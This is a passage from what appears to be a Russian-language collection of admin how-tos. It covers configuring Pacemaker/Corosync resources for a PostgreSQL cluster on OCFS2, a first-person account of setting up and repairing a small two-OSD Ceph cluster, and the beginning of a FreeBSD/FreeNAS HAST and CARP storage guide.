расположение можно указать с помощью директивы keyfile. После изменений необходимо перезапустить службы на каждом узле: root# systemctl restart corosync pacemaker Параметры узлов кластера Corosync Для работы кластера необходимо указать список узлов. Это делается в секции nodelist. nodelist { node { name: node1 nodeid: 1 ring0_addr: 192.168.1.11 } node { name: node2 nodeid: 2 ring0_addr: 192.168.1.12 } node { name: node3 nodeid: 3 ring0_addr: 192.168.1.13 } } После настройки, копируем файл /etc/corosync/corosync.conf на остальные узлы. Перезагружаем все узлы кластера и проверяем работу службы corosync с помощью команд corosync-quorumtool и crm_mon root@node1:~# corosync-quorumtool -s Quorum information ------------------ Date: Thu Jul 14 21:09:17 2022 Quorum provider: corosync_votequorum Nodes: 3 Node ID: 1 Ring ID: 1.139 Quorate: Yes Votequorum information ---------------------- Expected votes: 3 Highest expected: 3 Total votes: 3 Quorum: 2 Flags: Quorate Membership information ---------------------- Nodeid Votes Name 1 1 node1 (local) 2 1 node2 3 1 node3 root@node1:~# crm_mon -1 Cluster Summary: * Stack: corosync * Current DC: node3 (version 2.0.5-ba59be7122) - partition with quorum * Last updated: Thu Jul 14 21:11:18 2022 * Last change: Thu Jul 14 20:24:25 2022 by root via cibadmin on node1 * 3 nodes configured * 0 resource instances configured Node List: * Online: [ node1 node2 node3 ] Настройка Pacemaker Ресурсы Pacemaker описываются через XML-файлы, я вместо ручного написания xml-объектов буду использовать crm (CRM shell), где параметры ресурсов можно задать в виде аргументов. Смена имени кластера Ранее мы создали кластер OCFS2 с именем ocfs2clst, кластер Corosync с именем pgclst, теперь укажем имя кластера Pacemaker. После установки, имя кластера Pacemaker, обычно debian, поменяем его также на pgclst: root# crm_attribute --query --name=cluster-name scope=crm_config name=cluster-name value=debian root# crm_attribute --type crm_config --name cluster-name --update pgclst Параметры по-умолчанию Меняем параметры по-умолчанию для новых ресурсов:
resource-stickiness - "липучесть" ресурса к текущему расположению в кластере (по-умолчанию 0), или "стоимость" переноса ресурса на другой узел. При увеличении значения, pacemaker будет стараться восстановить состояние сбойного ресурса на том же узле, при малом значении - предпочтёт восстановить ресурс запуском на других узлах. root# crm_attribute --type rsc_defaults --name resource-stickiness --update 10
migration-threshold - кол-во сбоев ресурса на узле, при превышении которого происходит миграция на другой узел root# crm_attribute --type rsc_defaults --name migration-threshold --update 2 Ассиметричный кластер Можно указать, что для запуска каких-либо ресурсов необходимо наличие явного разрешающего правила. Это может понадобиться если не все узлы кластера идентичны по характеристикам: root# crm_attribute -n symmetric-cluster -v false После включения для каждого ресурса будет необходимо создать правила. crm conf location <имя правила> <имя ресурса> <приоритет>: <узел> Например, для ресурса виртуального ip-адреса (ip-pgclst) можно указать, что c приоритетом 100 он будет размещаться на узле node1, с приоритетом 10 - на узле node2, а на узле node3 его запуск будет запрещён (приоритет -infinity ): root~# crm conf crm(live)configure# location loc-ip-1 ip-pgclst 100: node1 crm(live)configure# location loc-ip-2 ip-pgclst 10: node2 crm(live)configure# location loc-ip-3 ip-pgclst -inf: node3 Изоляция узлов (stonith) В Pacemaker для каждого узла необходимо указать метод изоляции (fencing) в случае сбоя сетевой доступности. Осуществляется изоляция с помощью stonith ресурсов. Это могут быть программы для отключения питания на UPS, программы, которые подключаются к гипервизору и принудительно завершают работу виртуальной машины (нашего узла кластера) и много других вариантов. Без STONITH устройств Pacemaker откажется запускать ресурсы: root:~# crm_verify -L -V (unpack_resources) error: Resource start-up disabled since no STONITH resources have been defined (unpack_resources) error: Either configure some or disable STONITH with the stonith-enabled option (unpack_resources) error: NOTE: Clusters with shared data need STONITH to ensure data integrity Errors found during check: config not valid Список устройств для изоляции можно узнать из команды: root# stonith_admin --list-installed Параметры, необходимые устройству для работы, можно узнать: root# stonith -t <имя устройста stonith> -n Простейшие stonith ресурсы можно создать так. Ресурс-пустышка dummy - ничего не отключает: root# crm conf primitive sh-dummy stonith:null params hostlist="192.168.1.11 192.168.1.12 192.168.1.13" root# crm conf clone fency sh-dummy SSH-stonith - пытается подключиться к сбойному узлу через SSH и запланировать выключение через службу at (должна быть установлена на всех узлах). root# apt install at root# crm conf primitive fence-ssh stonith:ssh params hostlist="192.168.1.11 192.168.1.12 192.168.1.13" root# crm conf clone fency fence-ssh Имитируем сбой на узле node3: root# stonith -t ssh -p "node1 node2 node3" -T reset node3 Для тестирования может понадобится отключение STONITH (НЕ РЕКОМЕНДУЕТСЯ): root~# crm_attribute -n stonith-enabled -v false Очистить ошибки можно командой: root# stonith_admin --cleanup --history=node3 Стоит заметить что, в случае сбоя сети, кроме STONITH устройств, узел кластера может перезагрузить служба OCFS2. Если у какого-либо узла пропадёт связь с другими узлами, но он продолжит посылать heartbeat сообщения на кластерный диск, то через 30 секунд (значение sysctl kernel.panic = 30) этот узел будет перезагружен принудительно. Настройка PostgreSQL для работы под управлением Pacemaker/Corosync Для запуска PostgreSQL необходимо создать три ресурса:
Ресурс, который будет монтировать ФС, где расположена БД
Ресурс виртуального ip-адреса, по которому будут обращаться клиенты к СУБД
Ресурс, запускающий процессы СУБД PostgreSQL После необходимо настроить правила совместного расположения ресурсов и указать порядок запуска. В примере будет созданы ресурсы, обеспечивающие работу экземпляра СУБД. Ресурс, обеспечивающий монтирование ФС с БД Описание ресурса Pacemaker для ФС OCFS2 Ресурс fs-ocfs2 будет монтировать кластерную ФС OCFS2 в каталог /mnt/ocfs2clst на каждом узле. Монтирование будет производится по метке ФС. Том, где расположена БД, у меня имеет UUID метку ce92b1e7-30cb-4883-9a92-57c986f76acd (см. Создание ФС OCFS2). root~# mkdir -p /mnt/ocfs2clst # выполнить на каждом узле root@node1:~# crm conf crm(live/node1)configure# primitive fs-ocfs2 Filesystem \ params device="/dev/disk/by-uuid/ce92b1e7-30cb-4883-9a92-57c986f76acd" \ directory="/mnt/ocfs2clst" \ fstype=ocfs2 options="rw,relatime,commit=5,coherency=buffered" \ op start timeout=60s interval=0 \ op stop timeout=60s interval=0 \ op monitor timeout=40 interval=20 Полный список параметров монтирования можно узнать на странице https://www.kernel.org/doc/html/latest/filesystems/ocfs2.html По-умолчанию, ресурс запускается только на одном узле, но так как у нас ФС кластерная, необходимо запустить ресурс на всех узлах. Это возможно с помощью клона ресурса: crm(live/node1)configure# clone fs-clone-ocfs2 fs-ocfs2 Проверяем конфигурацию и выходим: crm(live/node1)configure# verify crm(live/node1)configure# commit crm(live/node1)configure# quit После создания ресурса, ФС должна автоматически смонтироваться на всех узлах кластера. root@node1:~# mounted.ocfs2 -f Device Stack Cluster F Nodes /dev/vdb o2cb ocfs2clst node1, node3, node2 Правила размещения ресурса на узлах Если указан параметр symmetric-cluster=false, то для запуска ресурсов необходимо указать явные правила, где ресурсы могут запускаться. Указываем, что ресурс кластерной ФС должен запускаться на всех узлах кластера с равным приоритетом 1: root~# crm conf crm(live)configure# location loc-fs-ocfs2-1 fs-clone-ocfs2 1: node1 crm(live)configure# location loc-fs-ocfs2-2 fs-clone-ocfs2 1: node2 crm(live)configure# location loc-fs-ocfs2-3 fs-clone-ocfs2 1: node3 crm(live)configure# verify crm(live)configure# commit crm(live)configure# quit Если symmetric-cluster=true (или параметр не задан), то создавать правила не обязательно. Ресурс виртуального ip-адреса Создаём ресурс ip-pgclst виртуального ip-адреса 192.168.1.10. Именно этот ip-адрес будет использовать СУБД для приёма подключений. root~# crm conf crm(live)configure# primitive ip-pgclst IPaddr \ params ip=192.168.1.10 \ op monitor interval=10s Если в атрибутах кластера Pacemaker указан параметр symmetric-cluster=false, то аналогично ресурсу файловой системы создаём правила размещения. Ресурс ip-адреса будет располагаться совместно с СУБД. Если производительность узлов отличается, то можно указать разные приоритеты для запуска. Предположим, что node1 мощнее, чем node2, а node3 вообще исключим для работы СУБД: root~# crm conf crm(live)configure# location loc-ip-pgclst-1 ip-pgclst 100: node1 crm(live)configure# location loc-ip-pgclst-2 ip-pgclst 10: node2 crm(live)configure# location loc-ip-pgclst-3 ip-pgclst -inf: node3 crm(live)configure# verify crm(live)configure# commit crm(live)configure# quit Если symmetric-cluster=true (или параметр не задан), то создавать правила не обязательно. У меня в примере правила размещения не используются. Ресурс Pacemaker, запускающий процессы СУБД PostgreSQL Инициализация файлов кластера БД PostgreSQL Изменяем владельца и права доступа на каталог с БД: root# chown -R postgres:postgres /mnt/ocfs2clst root# chmod 750 /mnt/ocfs2clst Инициализируем файлы кластера БД PostgreSQL в каталоге /mnt/ocfs2clst/pg-data с включением контроля чётности страниц БД, а после запускаем СУБД: postgres@node1:~$ /usr/lib/postgresql/13/bin/initdb -D /mnt/ocfs2clst/pg-data/ -A peer -k postgres@node1:~$ /usr/lib/postgresql/13/bin/pg_ctl -D /mnt/ocfs2clst/pg-data/ start Настройка конфигурации PostgreSQL Подключаемся к СУБД через unix-сокет: root@node1:~# su - postgres postgres@node1:~$ psql Изменяем параметры БД для возможности работы под управлением Pacemaker: psql> alter system set logging_collector=on; psql> alter system lc_messages = 'C.UTF-8'; psql> alter system set listen_addresses='192.168.1.10'; Здесь я включил сборщик сообщений (logging collector), поменял язык сообщений на английский (при работе по Pacemaker, русские сообщения заменялись вопросами) и указал, что СУБД должна принимать соединения только на кластерном ip-адресе. Если потребуется в кластере Pacemaker запустить несколько экземпляров Postgresql, то необходимо разместить unix-сокет СУБД по отдельным каталогам, так как по-умолчанию все экземпляры будут создавать сокет в каталоге /tmp. psql> alter system set unix_socket_directories = '/mnt/ocfs2clst/pg-data'; Например, если бы у нас было две БД: СУБД 1, кластерный ip 192.168.1.21, каталог /mnt/ocfs2clst/pg-db1 СУБД 2, кластерный ip 192.168.1.22, каталог /mnt/ocfs2clst/pg-db2 то unix_socket_directories необходимо задать: psql db1> alter system set unix_socket_directories = '/mnt/ocfs2clst/pg-db1'; psql db2> alter system set unix_socket_directories = '/mnt/ocfs2clst/pg-db2; В дальнейшем для подключения через unix-сокет необходимо указать путь к нему (команду необходимо выполнять на том узле, где работает СУБД): postgres@node1:~$ psql -h /mnt/ocfs2clst/pg-data/ Редактируем файл /mnt/ocfs2clst/pg-data/pg_hba.conf, разрешаем подключение по сети с паролем: ... # IPv4 network connections host all all all md5 ... После внесения настроек, останавливаем СУБД: postgres@node1:~$ /usr/lib/postgresql/13/bin/pg_ctl -D /mnt/ocfs2clst/pg-data/ stop Создание ресурса СУБД PostgreSQL root~# crm configure crm(live/node1)configure# primitive db-pgclst pgsql \ params pgctl="/usr/lib/postgresql/13/bin/pg_ctl" \ psql="/usr/lib/postgresql/13/bin/psql" \ pgdba=postgres \ pglibs="/usr/lib/postgresql/13/lib" \ pgdata="/mnt/ocfs2clst/pg-data" \ socketdir="/mnt/ocfs2clst/pg-data" \ config="/mnt/ocfs2clst/pg-data/postgresql.conf" \ op start timeout=120s interval=0 \ op stop timeout=120s interval=0 \ op monitor timeout=30 interval=30 Значения параметра socketdir в описании ресурса Pacemaker должно совпадать с параметром unix_socket_directories в файле конфигурации PostgreSQL postgresql.conf/postgresql.auto.conf. Правила размещения ресурса на узлах Аналогично ресурсу ip-адреса, если в атрибутах указан параметр symmetric-cluster=false, то создаём правила размещения ресура: root~# crm conf crm(live)configure# location loc-db-pgclst-1 db-pgclst 100: node1 crm(live)configure# location loc-db-pgclst-2 db-pgclst 10: node2 crm(live)configure# location loc-db-pgclst-3 db-pgclst -inf: node3 crm(live)configure# verify crm(live)configure# commit crm(live)configure# quit Если symmetric-cluster=true (или параметр не задан), то создавать правила не обязательно, тогда СУБД сможет запускаться на любом из узлов, при условии, что ресурсу ip-адреса так же разрешен запуск на всех узлах. У меня в примере правила размещения не используются. Правила, описывающие совместное расположение ресурсов Необходимо, чтобы виртуальный ip-адрес и экземпляра СУБД PostgreSQL располагались на одном узле, иначе СУБД не запустится. crm conf colocation <имя правила> <приоритет>: <ресурс1> <ресурс2> Для этого создаём соответствующее правило: root~# crm conf crm(live/node1)configure# colocation col-ip-pgsql inf: ip-pgclst db-pgclst crm(live/node1)configure# verify crm(live/node1)configure# commit crm(live/node1)configure# quit Правила, описывающие порядок запуска ресурсов Необходимо, чтобы ресурс виртуального ip-адреса и ресурс, монтирующий кластерную ФС OCFS2, запускались раньше ресурса СУБД PostgreSQL. crm conf order <имя правила> <приоритет>: <ресурс1> <ресурс2> Для этого создаём соответсвующие правила: root~# crm conf crm(live/node1)configure# order ord-fs-pgsql Mandatory: fs-clone-ocfs2 db-pgclst crm(live/node1)configure# order ord-ip-pgsql Mandatory: ip-pgclst db-pgclst crm(live/node1)configure# verify crm(live/node1)configure# commit crm(live/node1)configure# quit Проверка работы После настройки ресурсов проверяем, что все они запущены с помощью команды crm_mon: root@node1:~# crm_mon -nr1 Cluster Summary: * Stack: corosync * Current DC: node3 (version 2.0.5-ba59be7122) - partition with quorum * Last updated: Sat Jul 16 18:04:00 2022 * Last change: Sat Jul 16 10:52:30 2022 by root via cibadmin on node2 * 3 nodes configured * 8 resource instances configured Node List: * Node node1: online: * Resources: * fs-ocfs2 (ocf::heartbeat:Filesystem): Started * sh-dummy (stonith:null): Started * Node node2: online: * Resources: * sh-dummy (stonith:null): Started * fs-ocfs2 (ocf::heartbeat:Filesystem): Started * db-pgclst (ocf::heartbeat:pgsql): Started * ip-pgclst (ocf::heartbeat:IPaddr): Started * Node node3: online: * Resources: * sh-dummy (stonith:null): Started * fs-ocfs2 (ocf::heartbeat:Filesystem): Started Inactive Resources: * No inactive resources Из вывода видно, что СУБД запущена на узле node2. Подключимся к нему через ssh и создадим пользователя в Postgresql: user@pc:~$ ssh user@192.168.1.12 user@node2:~$ sudo su - postgres postgres@node2:~$ psql -h /mnt/ocfs2clst/pg-data/ postgres=# create role pguser login encrypted password 'пароль'; postgres=# \q Проверяем подключение к СУБД с клиента: user@pc:~$ psql -h 192.168.1.10 -U pguser postgres postgres=> select count(*) from pg_settings; count ------- 308 (1 строка) С любого узла кластера перемещаем СУБД на другой узел: root@node1:~# crm_resource --move -r db-pgclst -H node1 или с помощью CRM Shell root@node1:~# crm resource move db-pgclst node1 Определяем где запущен ресурс: root@node1:~# crm_resource -W -r db-pgclst resource db-pgclst is running on: node1 Выполняем повторный запрос с клиента: postgres=> select count(*) from pg_settings; FATAL: terminating connection due to administrator command сервер неожиданно закрыл соединение Скорее всего сервер прекратил работу из-за сбоя до или в процессе выполнения запроса. Подключение к серверу потеряно. Попытка восстановления удачна. psql (14.1, сервер 13.7 (Debian 13.7-0+deb11u1)) postgres=> select count(*) from pg_settings; count ------- 308 (1 строка) Как видно, при перемещении ресурса все соединения с СУБД закрылись, но повторный sql-запрос выполнился успешно. Команды перемещения ресуров crm_resource --move или crm resource move на самом делее создают в базе Pacemaker CIB запись: <rsc_location id="cli-prefer-db-pgclst" rsc="db-pgclst" role="Started" node="node1" score="INFINITY"/> Эта запись указывает в дальнейшем запускать ресурс db-pgclst на узле node1. Для того чтобы вернуть возможность запуска ресурса на любом из узлов достаточно выполнить одну из команд: root# crm_resource -r db-pgclst --clear root# crm resource clear db-pgclst Команды управления кластером Pacemaker root# crm_verify -L -V - проверка конфигурации Pacemaker root# crm_mon -rf - отслеживание статуса ресурсов root# crm_resource -W -r db-pgclst - определить расположение ресурса db-pgclst в кластере root# crm node standby - приостановить работу узла root# crm node online - возобновить работу узла root# crm resource status - посмотреть список ресурсов root# crm resource move db-pgclst node2 - мигрировать ресурс ip-pgclst на узел node2 root# crm resource clear db-pgclst - убрать привязку после переноса root# crm resource stop db-pgclst - остановить ресурс db-pgclst root# crm resource start db-pgclst - запустить работу ресурса db-pgclst root# crm resource cleanup db-pgclst или # crm_resource --resource db-pgclst --cleanup - сброс количества ошибок ресурса root# crm configure delete db-pgclst - удаление ресурса root# cibadmin --query > tmp.xml - создать дамп базы Pacemaker CIB

История про Ceph и реплику 1+2 Автор: alex [комментарии]

Обратился как-то знакомый с вопросом можно ли c Ceph реализовать реплику 1+2. Было 2 сервера OSD и требовалось сделать хранилище, причём только на запись (операции чтения не больше 10 процентов, а 90 процентов это запись). В виду горького раннего опыта с данной репликой и файловым Ceph пытался отговорить его от этого, но интерес взял своё. Итак задача звучала так: есть 2xOSD, в каждом 24 HDD диска по 8T и 4 SSD по 400G Основной задачей было обеспечение надёжности без применения CRUSH Map. Требовалось:
Ceph 2xOSD + 3MON,
Ceph: Версия не важно но
1 Обязательно файловая
2 Вынос журналов на SSD, то есть 1 SSD на 6 HDD дисков Железо осмотр: OSD все на intel C610/X99 CPU : 2 x Xeon(R) CPU E5-2620 v4 @ 2.10GHz RAM : 192G DIMM DDR4 M393A4K40BB0-CPB Video: AST1150 ASPEED Technology, Inc. HDD: 2xINTEL SSDSC2BA20 LAN : 2 x 1G I210 (ILO + Управление) LAN : 2 x 82599ES 10-Gigabit SFI/SFP+ Network Connection (на борту) LAN : 2 x MT27520 Family [ConnectX-3 Pro] 40-Gigabit QFP+ Mellanox Technologies Внешний JBOD SAS3008 PCI-Express Fusion-MPT SAS-3 24 x HDD HUH728080AL5204 (HGST) 7452GiB 7200rpm 4 x SDD HUSMM1640ASS204 (HGST) 372GiB Первое что было сделано это обновлены все биосы и прочее, что могло обновляться включая HDD: 2xINTEL SSDSC2BA20 установлен дистрибутив Ubuntu 18.04.1 LTS HDD: 2xINTEL SSDSC2BA20 были объедены в MD зеркало (бортовой аппаратный райд не помог т.к. в итоге система не видела 2 диска как единое блочное устройство) в итоге получилось 1G /boot (MD0) 16G SWAP на каждом диске 170G / также выделил 3 сервера одинаковых для mon и один сервер для настроек с которого собственно и буду все поднимать серверы одинаковые: ProLiant DL360 G5 CPU: 2xIntel(R) Xeon(R) CPU E5420 @ 2.50GHz RAM: 8G HDD: 2x148 на базе аппаратного Smart Array Controller P400i LAN: 2xNetXtreme II BCM5708 Gigabit Ethernet (Broadcom Limited) собрав все в зеркало и установил систему Ceph Подключаем репозиторий. Раз версия не важна то используем Mimic (13.2.0), остальных версий под указанный дистрибутив нет. 1. компьютер установщика: wget -q -O- 'https://download.ceph.com/keys/release.asc' | sudo apt-key add - echo "deb https://download.ceph.com/debian-mimic/ bionic main" > /etc/apt/sources.list.d/ceph.list apt update apt upgrade apt install ceph-common ceph-deploy 2. добавим ключи с машины инсталлятора, чтобы ходить по ssh без пароля 3. определимся с сетью в качестве коммутатора у заказчика Mellanox SX1024 1 12x40G + 48x10G что вполне со слов заказчика достаточно на первое время 2 Dlink 36xx для сети 1G и портом 10G на всякий случай для стыковки с мелланоксом сеть public-network 10.0.0.0/24 cluster-network 10.200.0.0/24 mon01 10.0.0.1/24 mon02 10.0.0.2/24 mon03 10.0.0.3/24 osd01 10G 10.0.0.4/24 40G 10.200.0.4/24 osd02 10G 10.0.0.5/24 40G 10.200.0.5/24 слепил я и оповестил файлы /etc/hosts этими значениями Инсталляция начнём как рекомендуется в документации, с мониторов 1. установим демон точного времени apt install chrony на OSD серверах шлюзов не будет, соответственно настроим сразу получение времени с mon01-03 2. Установим мониторы и сразу MGR ceph-deploy install --mon --release=mimic mon0{1,2,3} ceph-deploy install --mgr --release=mimic mgr0{1,2,3} ceph-deploy install --osd --release=mimic osd0{1,2} 3. Создадим кластер ceph-deploy new --public-network 10.0.0.0/24 mon0{1,2,3} добавим мониторы ceph-deploy mon create mon0{1,2,3} раздадим ключи ceph-deploy gatherkeys mon0{1,2,3} добавим в начальный файл конфигурации mon_allow_pool_delete = true cluster network = 10.200.0.0/24 osd pool default size = 2 osd pool default min size = 1 osd mkfs options xfs = -f -s size=4096 и раздадим его всем cp *.keyring ceph.conf /etc/ceph/ добавим mgr ceph-deploy mgr create mgr0{1,2,3} раздадим и проверим конфигурацию на всех серверах и проверим ceph ceph -s cluster: id: 6dae468a-ac29-4cc6-a3e1-7b2a7247eb5b health: HEALTH_OK services: mon: 3 daemons, quorum mon01,mon02,mon03 mgr: mgr01(active), standbys: mgr02, mgr03
Займёмся osd ssh osd01 прогоним все диски parted -s /dev/sdj mklabel gpt почистим диски /usr/sbin/ceph-volume zap /dev/sdh ................ /usr/sbin/ceph-volume zap /dev/sdo и повторим то же на OSD02 вернёмся на инсталлиционый сервер и для теста создадим пару OSD с двух OSD серверов можно ещё раз проделать это с инсталляционного сервера ceph-deploy disk zap osd01:sdh ceph-deploy disk zap osd02:sdh ceph-deploy disk zap osd01:sdi ceph-deploy disk zap osd02:sdi
/dev/sdh это HDD OSD01
/dev/sdh это HDD OSD02
/dev/sdi это SSD OSD01
/dev/sdi это SSD OSD02 напомним, версия ФАЙЛОВАЯ и журналы на SSD без параметров, создаётся bluestore ceph-deploy osd create --filestore --data /dev/sdh --journal /dev/sdi osd01 ceph-deploy osd create --filestore --data /dev/sdh --journal /dev/sdi osd02
Убедимся что все верно ceph-deploy osd list osd01 ceph-deploy osd list osd02 клиент предупредил, что тестировать будет и нужно минимум 4 диска ну 4 так 4 проделал с остальными тоже самое в итоге 4 диска ceph osd tree ID CLASS WEIGHT TYPE NAME STATUS REWEIGHT PRI-AFF -1 352.22583 root default -7 176.11292 host osd01 0 hdd 7.27739 osd.0 up 1.00000 1.00000 1 hdd 7.27739 osd.1 up 1.00000 1.00000 2 hdd 7.27739 osd.2 up 1.00000 1.00000 3 hdd 7.27739 osd.3 up 1.00000 1.00000 0 ssd 0.36389 osd.0 up 1.00000 1.00000 1 ssd 0.36389 osd.1 up 1.00000 1.00000 2 ssd 0.36389 osd.2 up 1.00000 1.00000 3 ssd 0.36389 osd.3 up 1.00000 1.00000 -7 176.11292 host osd02 0 hdd 7.27739 osd.0 up 1.00000 1.00000 1 hdd 7.27739 osd.1 up 1.00000 1.00000 2 hdd 7.27739 osd.2 up 1.00000 1.00000 3 hdd 7.27739 osd.3 up 1.00000 1.00000 0 ssd 0.36389 osd.0 up 1.00000 1.00000 1 ssd 0.36389 osd.1 up 1.00000 1.00000 2 ssd 0.36389 osd.2 up 1.00000 1.00000 3 ssd 0.36389 osd.3 up 1.00000 1.00000 Видно что SSD нормально определился напомню, что проблема с правкой крушмапа осталась в версии до 12.x.x. далее подготовим pg ceph osd crush rule create-replicated hdd default host hdd ceph osd pool create hdd-rbd 512 ceph osd pool set hdd-rbd crush_rule hdd для тестов подойдёт и не забываем что на SSD у нас журналы и за ними надо следить !! подготовим для теста RBD rbd create --size 1T --image-feature layering,exclusive-lock --image hdd-rbd/test --image-feature именно такие так как будем использовать ядерный модуль, а с другими параметрами он не цепляется Дополним cat /etc/ceph/rbdmap hdd-rbd/test id=admin,keyring=/etc/ceph/ceph.client.admin.keyring и примонтируем rbdmap map проверим ls /dev/rbd/hdd-rbd/test /dev/rbd/hdd-rbd/test и появилось у нас новое устройство /dev/rbd0 померим hdparm -Tt /dev/rbd0 /dev/rbd0: Timing cached reads: 8226 MB in 2.00 seconds = 4122.93 MB/sec Timing buffered disk reads: 1636 MB in 3.00 seconds = 545.21 MB/sec dd if=/dev/zero of=/dev/rbd0 bs=1G count=1 oflag=direct 1+0 records in 1+0 records out 1073741824 bytes (1,1 GB, 1,0 GiB) copied, 10,0574 s, 107 MB/s попробуем, что скажет fio fio --name=writefile --size=1G --filesize=1G --filename=/dev/rbd0 --bs=1M --nrfiles=1 \ --direct=1 --sync=0 --randrepeat=0 --rw=write --refill_buffers --end_fsync=1 --iodepth=200 --ioengine=libaio writefile: (g=0): rw=write, bs=(R) 1024KiB-1024KiB, (W) 1024KiB- 1024KiB, (T) 1024KiB-1024KiB, ioengine=libaio, iodepth=200 fio-3.1 Starting 1 process Jobs: 1 (f=1): [W(1)][83.3%][r=0KiB/s,w=20.0MiB/s][r=0,w=20 IOPS][eta 00m:02s] writefile: (groupid=0, jobs=1): err= 0: pid=6404: Thu Aug 9 19:50:56 2018 write: IOPS=109, BW=110MiB/s (115MB/s)(1024MiB/9320msec) ну и случайное fio --time_based --name=benchmark --size=1G --runtime=30 --filename=/dev/rbd0 --ioengine=libaio \ --randrepeat=0 --iodepth=128 --direct=1 --invalidate=1 --verify=0 --verify_fatal=0 --numjobs=4 \ --rw=randwrite --blocksize=4k --group_reporting benchmark: (g=0): rw=randwrite, bs=(R) 4096B-4096B, (W) 4096B-4096B, (T) 4096B-4096B, ioengine=libaio, iodepth=128 ... fio-3.1 Starting 4 processes Jobs: 4 (f=4): [w(4)][100.0%][r=0KiB/s,w=80.2MiB/s][r=0,w=20.5k IOPS][eta 00m:00s] benchmark: (groupid=0, jobs=4): err= 0: pid=6411: Thu Aug 9 19:53:37 2018 write: IOPS=19.8k, BW=77.2MiB/s (80.9MB/s)(2315MiB/30006msec) slat (usec): min=4, max=199825, avg=193.15, stdev=1838.51 clat (msec): min=3, max=1348, avg=25.70, stdev=28.44 lat (msec): min=3, max=1349, avg=25.89, stdev=28.54 clat percentiles (msec): | 1.00th=[ 12], 5.00th=[ 14], 10.00th=[ 16], 20.00th=[ 17], | 30.00th=[ 19], 40.00th=[ 20], 50.00th=[ 21], 60.00th=[ 22], | 70.00th=[ 24], 80.00th=[ 26], 90.00th=[ 30], 95.00th=[ 41], | 99.00th=[ 155], 99.50th=[ 169], 99.90th=[ 363], 99.95th=[ 401], | 99.99th=[ 827] bw ( KiB/s): min= 4444, max=26995, per=25.07%, avg=19805.94, stdev=5061.73, samples=240 iops : min= 1111, max= 6748, avg=4951.28, stdev=1265.42, samples=240 lat (msec) : 4=0.01%, 10=0.30%, 20=44.53%, 50=51.12%, 100=1.34% lat (msec) : 250=2.50%, 500=0.18%, 750=0.01%, 1000=0.01%, 2000=0.01% cpu : usr=3.38%, sys=5.67%, ctx=75740, majf=0, minf=37 IO depths : 1=0.1%, 2=0.1%, 4=0.1%, 8=0.1%, 16=0.1%, 32=0.1%, >=64=100.0% submit : 0=0.0%, 4=100.0%, 8=0.0%, 16=0.0%, 32=0.0%, 64=0.0%, >=64=0.0% complete : 0=0.0%, 4=100.0%, 8=0.0%, 16=0.0%, 32=0.0%, 64=0.0%, >=64=0.1% issued rwt: total=0,592666,0, short=0,0,0, dropped=0,0,0 latency : target=0, window=0, percentile=100.00%, depth=128 Run status group 0 (all jobs): WRITE: bw=77.2MiB/s (80.9MB/s), 77.2MiB/s-77.2MiB/s (80.9MB/s-80.9MB/s), io=2315MiB (2428MB), run=30006-30006msec Disk stats (read/write): rbd0: ios=0/589859, merge=0/0, ticks=0/3725372, in_queue=3594988, util=100.00% также любезный Себастьян написал красивые вещи:
https://www.sebastien-han.fr/blog/2012/08/26/ceph-benchmarks/
https://www.sebastien-han.fr/blog/2013/10/03/quick-analysis-of-the-ceph-io-layer/ Кластер нужен на запись, поэтому основные тесты на запись. Остался доволен и отдал для теста заказчику Утром след дня заказчик заявил, что я неверно все сделал!!! ???????!!!!!! захожу и вижу cluster: id: 6dae468a-ac29-4cc6-a3e1-7b2a7247eb5b health: HEALTH_ERR 6 osds down 1 host (6 osds) down 5 scrub errors Possible data damage: 4 pgs inconsistent Degraded data redundancy: 2423/4847 objects degraded (50.000%), 2560 pgs degraded, 2560 pgs undersized clock skew detected on mon.mon03 1/3 mons down, quorum mon01,mon03 services: mon: 3 daemons, quorum mon01,mon03, out of quorum: mon02 mgr: mgr02(active), standbys: mgr03, mgr01 osd: 12 osds: 6 up, 12 in ceph health detail HEALTH_ERR 5 scrub errors; Possible data damage: 4 pgs inconsistent OSD_SCRUB_ERRORS 5 scrub errors PG_DAMAGED Possible data damage: 4 pgs inconsistent pg 1.14 is active+clean+inconsistent, acting [12,34] pg 1.27b is active+clean+inconsistent, acting [46,20] pg 1.683 is active+clean+inconsistent, acting [20,34] pg 1.728 is active+clean+inconsistent, acting [49,6] ну ладно попробуем восстановить root@ceph-deploy:~# ceph pg repair 1.728 instructing pg 1.728 on osd.4 to repair .................. instructing pg 1.14 on osd.2 to repair Тем временем задаю вопросы. Выяснилось, заказчик взял и переставил 2 ssd и 2 HDD с другого сервера, а затем отключил 1 OSD. Вспомнив, что на SSD журналы слал думать что можно сделать. Заодно спросил чем 3-й монитор не угодил? На что получил ответ, что все это для теста и нужно проверить все. Так похоже что FileStore мало подходит Пробуем с Blustore Blustore оказался более пригоден и более живуч для исправления ошибок написал скрипт cat /root/rep.sh #!/bin/sh /usr/bin/ceph health detail | grep active+clean+inconsistent | awk '{ print $2 }' | while read a; do /usr/bin/ceph pg repair $a ; done который стартую по крону */10 * * * * /root/rep.sh

Создание отказоустойчивого хранилища на базе FreeBSD или FreeNAS с использованием ZFS, HAST и CARP (доп. ссылка 1) [комментарии]

Начиная с FreeBSD 8.1 в состав включена поддержка системы репликации устройств хранения данных HAST (Highly Avalable STorage), позволяющей создавать высоконадежные конфигурации, в которых данные синхронизированы между несколькими узлами. HAST реализован в виде работающего на уровне пользователя демона hastd, использующего стандартный класс GEOM Gate для обработки запросов ввода/вывода. Hastd, обеспечивает синхронную репликацию блочных устройств поверх TCP/IP сетей, независимо от типа накопителя и файловой системы. HAST предусматривает возможность быстрого восстановления после сбоя, причём, при выходе из строя первичного master-узла, его функции могут быть делегированы slave-узлу. После проверки и монтирования UFS раздела или импорта ZFS пула на поврежденном узле, система автоматически синхронизирует внесенные за время восстановления изменения и продолжит работу без потери данных. Для быстрого развёртывания хранилищ удобно использовать дистрибутив FreeNAS. К сожалению в настоящее время FreeNAS не поддерживает HAST из коробки, но так как во FreeNAS используются стандартные компоненты FreeBSD 8.x, ни что не мешает самостоятельно вручную создать и надстроить работу подобных хранилищ. После первой загрузки FreeNAS настроим параметры сетевого доступа и DNS. Первый узел freenas1 будет иметь IP 192.168.137.31, а второй freenas2 - 192.168.137.32. После первичной типовой настройки подключимся к shell. Настройка узла HAST Перемонтируем корневой раздел для обеспечения возможности записи: mount -uw / Создадим массив хранения RAID3 из дисков da1, da2, da3. graid3 label gr0raid3 da1 da2 da3 В итоге будет создано устройство /dev/raid3/gr0raid3 Включим поддержку CARP и активируем демон hastd: cat <<EOF >> /conf/base/etc/rc.conf ifconfig carp0 create ifconfig carp0 vhid 1 pass freenashast 192.168.137.30/24 # 